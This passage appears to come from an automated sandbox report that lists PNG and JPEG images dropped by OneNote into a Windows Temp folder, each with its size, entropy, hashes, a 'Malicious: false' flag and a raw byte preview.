C:\Users\user\AppData\Local\Temp\{CD4AA668-64FA-4C86-88F1-EA6A8D8249E5}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	22634
Entropy (8bit):	7.974332204835705
Encrypted:	false
SSDEEP:	384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
MD5:	548D234C9AB4021CA5FAB7BF22502465
SHA1:	2F7495D250DC86EA99473CC342D164B859926021
SHA-256:	7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
SHA-512:	261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
Malicious:	false
Preview:	.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O\|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../\|.O........7_...Oj....\|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[\|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.\|..kv....];j\|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9\|.m.+`).\|......x..vak-].../.....G'....4.>B6$.......-o.q..L;.N+....>...=.!.Y..Q...?......7..,....}

C:\Users\user\AppData\Local\Temp\{CD9D3FC4-A13E-4E8C-AC4D-3E7CACFFA2D3}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3
Category:	dropped
Size (bytes):	68633
Entropy (8bit):	7.709776384921022
Encrypted:	false
SSDEEP:	1536:tapXpSTJDOkFGdJdBk/slsbfsw1imaapnbvD8:U2OjJr6b07m1bvD8
MD5:	41241EE59AB7BC9EB34784E3BCE31CB4
SHA1:	98680761A51E9199CF3C89F68B5309FBEC7EE3CB
SHA-256:	035B26DF61855A3F36DBD30FDAB0C157C04C9E8AE2197EA4D4AEB3E82E6A4C2B
SHA-512:	3EE331D5BCEE4AD5D3FC9661D4AB4053F7D351591A094334F963C33C9D0E32CCCABE9334AD7C308108CE99617E064FE848DCD469ACD8D83FBE5C4452DE523D8F
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:05:55.............................d...........j...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?../$.W:SZ./...9.....-...u......r.....].c...@W_.7...+......v.+PD.I..-<1.pDn-\.....p.$....0.}V....\..>.~..XN.o..l(E....ik..o.

C:\Users\user\AppData\Local\Temp\{CDE17D1A-D09B-4EA2-94CC-49144ABF7010}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13241
Entropy (8bit):	7.931391290415517
Encrypted:	false
SSDEEP:	384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
MD5:	01367FEEE0A83E8765E971E0D3740900
SHA1:	CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
SHA-256:	18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
SHA-512:	8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
Malicious:	false
Preview:	.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......EX........wo9..9.\|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~..U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J.w.mdv.&..@....R..o/.^..5...x.g.>..ag....GM\|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B\|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

C:\Users\user\AppData\Local\Temp\{CDE78E13-B996-4F45-A043-9CDACD55D2E8}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4847
Entropy (8bit):	7.950192613458318
Encrypted:	false
SSDEEP:	96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
MD5:	A1A1017A6A7928761CEB56D1D950E123
SHA1:	28272E9C7F816A1CE8F2033FC00F489005332365
SHA-256:	72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
SHA-512:	10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
Malicious:	false
Preview:	.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..\|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...\|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.\|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

C:\Users\user\AppData\Local\Temp\{CF8577A8-67C1-44B4-B47B-63AA1CC66729}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4081
Entropy (8bit):	7.943373267196131
Encrypted:	false
SSDEEP:	96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
MD5:	29B87BEEC5D3899824AA390530CD47FB
SHA1:	55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
SHA-256:	F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
SHA-512:	1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
Malicious:	false
Preview:	.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a............k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5....F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.. 8T=/'9,.KDW...GN;0(P3_....1......'.;..;\|.L.a.&<\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._\|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

C:\Users\user\AppData\Local\Temp\{CF9562EA-9595-4E45-ADBA-4FB1EC96BC1E}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 50 x 556, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	977
Entropy (8bit):	7.231269197132181
Encrypted:	false
SSDEEP:	12:6v/7QiFJaY/z+obuqFA4fypjQSbtBK+lcqNGSbb7XTJArRRzN5DjNRkPmu5cCbR2:x0QY7xbjy9pY0JPXLTWroeuCCbX0
MD5:	B7F74C18002A81A578A4EE60C407A8D3
SHA1:	70A7D4BB1B3ADF4397D168AD0D81B286F88EBDE0
SHA-256:	95F59A0433050180D4C0E8858B83363D51BEA6752A8B7CA516A8677854D8F5B6
SHA-512:	13186A7CDCE80BCA9D2238666D6D7A989FA1887EABFA5D8A9A63EEC304DFD4BE8EFF652205FA56E1D1CEE7D3680AF8C70A952AF73AB3C246400E8D4EBECBDBA9
Malicious:	false
Preview:	.PNG........IHDR...2...,........A....PLTE...................................................................................................................................................................................$.y.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^...0.D_.......cck.....%a...X.a0Y...-..!.G...[....(.r.H.$...1 .zq.4V.e\|a.6.X..4..kl.%....=w....6..TN.....{.4..T/.z...../.....3..!~..t.#b..^.....E!.SFb ...-.....^...,..C.!.b...i._c...s.X.w.. lsQH..H.gKc@@...i. ....m...;Ci....@G.; V{..lO..\.R9e$..{.....P...E.+.2.0D.B,..P...56.?......K.6..TN....^z.4..T/.z...../.....3..!~..t.]b........E!.SFb ...-.....^...,..C.!.b...i._c..Y.O...?.9k2.M.?5 .n.P...,...d._..%M?....6....,.1..R.4.a.R.+..U.Q..P...vd..T........j .]@....."..lJ../.90.4...Y. ...9.%...{......Hc%.....i..%M?aG..H....o.q.......4.......X.d9.r..CI.O.5.Ri0?.s\b....w...>/k..4V.)Y....P...vd..T........j .]@....."..lJ../.90..2..MP..l..?....K.X.....IEND.B`.

C:\Users\user\AppData\Local\Temp\{CFD7B608-0F5F-46F2-99D5-6232F6EBB2A7}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 30 x 700, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	1547
Entropy (8bit):	6.4194805172468286
Encrypted:	false
SSDEEP:	24:dZeDNYbS+238CTUFPA6SXG5qSacX9q73eXu0vC3dU+OB2gbwHRuZ:dykp9FzBBacXQ3uNC3n7xuZ
MD5:	0BA36A74DFBF411FAB348404CCEC3348
SHA1:	4C619790E517416E178161028987DF1CD3B871CC
SHA-256:	2E7AAF26BEC32148B96442E8FFF1BD2CEF2D72630969F23B9A2ABEDB6CFEC93B
SHA-512:	90AF53DB7C413E2ADB970AC345F73E4ED8AF626E179C929E6560118F7A9E98DC7C5FF02B2B3F6C98D397E0FE2D85F3427C6928C328872149E176FA8A99E91F54
Malicious:	false
Preview:	.PNG........IHDR...............\....PLTE.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................D......bKGD....H....cmPPJCmp0712....H.s.....IDATx^.WSTA........b.0gPPP0..E.9b@L(.c.N.U>..@......;...}..B.(....$......5..XS...I....).!....D^.uE...\..5........F."o..-...m.n. .^.....q= .

C:\Users\user\AppData\Local\Temp\{D19EE8B7-E754-43CD-9848-5F384FA16EF0}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	5386
Entropy (8bit):	7.943706538857394
Encrypted:	false
SSDEEP:	96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
MD5:	DB48555480A383CD1D4DD00E2BCFCF29
SHA1:	8060B6FE12175289F0A71F45B894030A0D9F1AB5
SHA-256:	807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
SHA-512:	2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
Malicious:	false
Preview:	.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++...pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.\|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k\|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

C:\Users\user\AppData\Local\Temp\{D1C8E964-20C5-4222-BC69-EA0F6C8B3EE0}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4081
Entropy (8bit):	7.943373267196131
Encrypted:	false
SSDEEP:	96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
MD5:	29B87BEEC5D3899824AA390530CD47FB
SHA1:	55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
SHA-256:	F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
SHA-512:	1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
Malicious:	false
Preview:	.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a............k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5....F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.. 8T=/'9,.KDW...GN;0(P3_....1......'.;..;\|.L.a.&<\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._\|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

C:\Users\user\AppData\Local\Temp\{D3887EB0-33C6-442A-AA5B-1E8FF4F25C70}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4490
Entropy (8bit):	7.928016176674318
Encrypted:	false
SSDEEP:	96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
MD5:	7F161B19B937AB48D4FD2F6E5E16FDBD
SHA1:	BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
SHA-256:	C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
SHA-512:	E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
Malicious:	false
Preview:	.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.\|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.\|...\.z..6j>..n....Y.&G.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P.....'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^.....W..?}t...{.B.8..D...UPa..~..C...\|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.......G...K.....e...b.\|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

C:\Users\user\AppData\Local\Temp\{D629E798-AD10-4CF1-9220-BCDEC0AC0FA8}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	8184
Entropy (8bit):	7.807848176906598
Encrypted:	false
SSDEEP:	192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
MD5:	5B386BF9A20766956A84F67F913F23D7
SHA1:	6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
SHA-256:	DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
SHA-512:	99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
Malicious:	false
Preview:	.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..\|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.\|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

C:\Users\user\AppData\Local\Temp\{D6D5BAF1-225A-4337-84C8-82544369B847}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13030
Entropy (8bit):	7.948664903731204
Encrypted:	false
SSDEEP:	384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
MD5:	17E9FF9F735102231846936F0E2BAF1A
SHA1:	9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
SHA-256:	DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
SHA-512:	71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
Malicious:	false
Preview:	.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .....z..\|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..pM......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

C:\Users\user\AppData\Local\Temp\{D7D0CF62-236C-4B19-98AB-66A09BDF499C}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	34299
Entropy (8bit):	7.247541176493898
Encrypted:	false
SSDEEP:	768:BrSX4V3P8AIc4KLkHeXRUer0zrhOmXfvG0yH82I:tSXuIc4K2eBtswKsHg
MD5:	E9C52A7381075E4EBC59296F96C79399
SHA1:	BE295AD24D46E2420D7163642B658BF3234A27EA
SHA-256:	D56CEFE9EE2FAE72E31BDBA7DD2AA4426EA22E3CEB22EF68C8F63F9F24D5A8BC
SHA-512:	95CC96DD4459EBAE623176033BA204CCDC50681A768F8CBAE94C16927D140224E49D5197CAE669C83C77010C5C04C1346CF126BEF49DB686F636C5480342A77F
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.......................................................................................!.1..A..Qaq......".#4.2r3.$.%...B.5U&6....Rb.Cs.7..cDTEFVf'...S..dtevw.u.........Gg.....................!1..AQ.aq.2....."#3.4....r..BRb$CS.D............?..5..............#....v.q.m.}\..{....;...r....h.....J..q\|..'.;\..6..v......e...../.k..\|.8..i..\|..]..3e.m....n..Z.GS..n".y..w.-...[a...7A.....i.4.)9\..~C...=.........s..\V]c.D1<./.g.l.&v..~.h..]....zb>G..y:vNS.\......LU....t.{*..Z#.?..v-...wn.rR...P.....y\=.v....../..9_...m4...V.\|.+.o.#.......xj....}..>.s.>C...m.[;.>.p...=^.i.X.(..1...{.F#N.W...xi.z...4..u[{...yO.....8..}\..2...KlX.nbya...2.&.F...R.b.k.7.GV.x.h.y\.Q..O<\>......-...=...r......\......Z.Z...Jf.'....z..Y.q>.p....o..K....h..R..c.lg?......A.Z...Y.q3.L\|.'5...

C:\Users\user\AppData\Local\Temp\{DA92EE50-C386-4E6C-A676-F1C405EDC2F5}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3
Category:	dropped
Size (bytes):	22203
Entropy (8bit):	6.977175130747846
Encrypted:	false
SSDEEP:	192:5q3R1VBvq3R1Flrk6Q0QPJJrR39joOVMJ25d1NkMhIwobbtAAAqYnLJZMJYZ2AC:xw6Q0WJR3FoOVMJIIlAAAqYnMJdD
MD5:	2D3128554F6286809B2C8E99DE5FD3F6
SHA1:	FC42CB04151D36F448093BDEFE33031A9B8D797D
SHA-256:	14FA2D16310485AA1CE41F6D774A3D637E8CF8B03C4F72990155DF274FDB6BD9
SHA-512:	D8531247A6E89ECABEA9C4A78F596CCE3493334EDF71AE4F7998FDDD0F80705948609C89756AB56FDFAB6D04DEC5F699A693801A772CA2EE2465BDD2CE5D2D5A
Malicious:	false
Preview:	......JFIF.....H.H.....XExif..MM..............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:06:24............................&.........................................................(.....................&..................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...H.....Go.Kxn.b..g...........%?_....O......q......7G......%%.V..8zm.].v?...jJ~._..>.......O;........o..rI.A.....n.a.........

C:\Users\user\AppData\Local\Temp\{DA9CEF39-CCBE-46D5-AE1D-42CCC93DF1E1}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 60 x 336, 4-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	347
Entropy (8bit):	6.85024426015615
Encrypted:	false
SSDEEP:	6:6v/lhPtnlx/QulkWNY2V18A6Akp7eee1VDjMHCyLezyKUX5Gp:6v/7RrIubiA6AkpNhiyKe+
MD5:	78762C169F8B104CB57DFF5A1669D2DF
SHA1:	9638B71B584CD636834016A635ABF8D9C0887711
SHA-256:	E64FDCD0B108737D8B8F7B677029F924031D6BBAA50585D9C3DEF7C7E92ECAF2
SHA-512:	5ED899AAF73B72DEC32E171FFA112382667D5BF3FBA98C92E313E66C0A6975EA97068F4CD32B62283F18DBD5345C11E3610F7EEAC2F2DE71FC44593180B9CEAC
Malicious:	false
Preview:	.PNG........IHDR...<...P.............PLTE......................=l......bKGD....H....cmPPJCmp0712....Om......IDATh......@..aI...B..C..l...^.%.`....>.]..\|0.....a...hb...0......q.......p"....;...K..x=...p...y.yy~J....\|...\.......y..X.......'...>1...Ky..f....&........N`..f0..b...3.......`Z.3..3.....o.......4.&........SV...4.....IEND.B`.

C:\Users\user\AppData\Local\Temp\{DAD0BDD5-A8B1-48A3-B25F-518D00E41530}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13241
Entropy (8bit):	7.931391290415517
Encrypted:	false
SSDEEP:	384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
MD5:	01367FEEE0A83E8765E971E0D3740900
